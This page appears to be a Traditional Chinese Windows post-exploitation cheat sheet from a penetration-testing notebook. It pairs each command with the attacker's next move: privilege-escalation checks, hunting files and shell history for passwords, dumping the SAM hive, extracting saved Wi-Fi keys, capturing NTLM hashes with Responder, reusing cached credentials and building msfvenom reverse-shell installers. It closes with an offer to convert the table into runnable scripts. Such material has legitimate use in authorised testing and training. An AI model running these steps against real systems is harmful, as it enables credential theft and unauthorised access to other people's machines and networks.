Windows + Linux 工具
Windows 權限偵察與後續行動表格(含姿勢判斷 + 完整指令)
初始存取(Exploit 漏洞打進機器)
systeminfo
wmic product get name
掃描應用程式是否存在弱點(如 Java 6、Flash、老版 7-Zip、TeamViewer)
是
查 CVE,準備特定 Exploit 或利用 DLL Hijacking
使用 msfvenom 生成惡意 MSI 並建立反向連線
權限提升(提升為 SYSTEM / Administrator)
whoami /priv
SeImpersonate / SeAssignPrimaryToken / SeDebugPrivilege / SeTakeOwnershipPrivilege /SeBackupPrivilege /SeLoadDriverPrivilege
存在
net local "Event Log Readers"
顯示自己的名字
Get-ADGroupMember -Identity DnsAdmins
顯示自己的名字
Get-LocalGroupMember -Group "Hyper-V Administrators"
顯示自己的名字
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
如果是 0x2
或 0x0
,恭喜,非常容易利用!
.\SharpUp.exe audit
找 Modifiable Service Binaries
、Modifiable Services
或 Modifiable Registry Keys
是
憑證擷取(Dump SAM、LSASS、Security Hive 等)
net user
檢查本地帳戶所屬群組,如 Administrators、是否已啟用、上次登入時間
存在
測試本地或遠端登入,收集活動用戶資訊
net localgroup
群組中是否出現其他使用者(如其他網域使用者)或服務帳戶 -> 提示潛在橫向目標
存在
測試本地或遠端登入,辨識可能通用憑證
net localgroup "Event Log Readers"
有帳號存在 -> 可無需提權查看安全日誌,例如登入事件4624
是
嘗試讀取安全日誌,觀察高權限帳號活動或登入來源
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
快速搜尋敏感檔案,針對 config 設定、密碼備註等
有密碼關鍵字
嘗試登入 SMB、RDP、AD、VPN 等外部資源
gc 'C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt'
使用者自訂詞典,常用於自定義拼字,可為密碼字典來源
有詞彙
擴充字典進行暴力破解或社工口令組合
Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,unattend.xml.bak -ErrorAction SilentlyContinue
搜尋系統自動化部署檔,常見於 AD join 或本地帳號配置
有檔案
解析明文帳密,執行本地或橫向登入
gc (Get-PSReadLineOption).HistorySavePath
PowerShell 使用歷史,會留有憑證、命令、IP 等行為痕跡
有敏感內容
重複利用命令、憑證、服務指令構建 lateral pivoting
findstr /SI /M "password" *.txt *.ini *.cfg *.config *.xml
多點位掃描用戶文件夾與備份
有內容
嘗試登入其他服務或雲端資源
Select-String -Path C:\Users\*\Documents\*.txt -Pattern "password"
精準搜尋 Documents 內部檔案,有較高命中率
有發現
做憑證爆破或橫向移動測試
%SYSTEMDRIVE%\pagefile.sys
交換記憶體檔案,可能保有歷史密碼、明文資訊
可取得
用 volatility 分析記憶體,找帳密或 hash、token 等敏感資訊
cmdkey /list
Windows 儲存的憑證快取,可供 runas 調用
有憑證紀錄
使用 runas /savecred
重複登入,靜默使用憑證攻擊
%WINDIR%\debug\NetSetup.log
Windows AD 加入記錄,可能含帳號或建立者資訊
可見
推估 AD 管理者行為、找通用憑證線索
%WINDIR%\system32\config\security.sav
備份登錄檔,含安全性策略與權限資訊
可取得
做離線 Registry 分析,找 SID / ACL 或權限設定
密碼破解(Hashcat / John 等離線攻擊)
C:\ProgramData\Configs*
常用為自訂軟體的儲存位置,含明文帳密或 token
有設定檔
尋找帳密設定或備份,橫向攻擊新目標
sudo responder -wrf -v -I tun0
捕獲 NTLM Hash:如 SMB Relay、WPAD、HTTP 基於 LAN 攔截
取得 hash
使用 hashcat / john 破解或 pass-the-hash 利用
%USERPROFILE%\ntuser.dat
使用者行為分析登錄檔,可含自動登入帳密、自動啟動項等
可取
分析使用者行為紀錄與憑證痕跡、Persist 構建依據
👉【橫向移動】:使用擷取的憑證去登入別的主機(RDP、SMB、WMI、Psexec)
如果可以使用admin 開啟cmd.exe
reg save HKLM\SAM C:\sam.save
成功
SAM 攻擊
機密提取 / 控制權奪取 / 攻擊橫向擴張
net use
列出網路磁碟掛載、憑證綁定、AD 使用紀錄
有磁碟掛載
掃描共用資料夾找憑證、內部資源與 Payload 放置點
netsh wlan show profile
檢查無線網路清單
有 Wi-Fi 設定檔
下一步使用 key=clear 取出密碼
netsh wlan show profile <ProfileName> key=clear
顯示明文 Wi-Fi 密碼
密碼出現
進行無線網路滲透(無線中繼、偽 AP 攻擊)
💡此表格可配合每次主機滲透過程逐項操作,逐條判斷是否能提權、轉向、獲取憑證或進行後門維持。 若需匯出 PDF、Markdown、或轉成可執行腳本(如 AutoRecon 模組),可進一步告知。
最后更新于
这有帮助吗?